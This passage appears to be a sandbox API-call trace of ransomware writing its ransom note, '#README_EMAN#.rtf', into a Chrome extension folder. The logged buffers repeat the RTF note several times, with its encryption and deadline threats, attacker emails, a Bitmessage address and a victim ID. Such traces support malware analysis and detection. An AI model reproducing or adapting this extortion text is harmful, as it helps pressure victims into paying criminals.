\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.329] WriteFile (in: hFile=0x2e8, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.330] CloseHandle (hObject=0x2e8) returned 1 [0289.330] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\#readme_eman#.rtf")) returned 0xffffffff [0289.333] GetLastError () returned 0x2 [0289.333] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.334] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.334] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.334] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 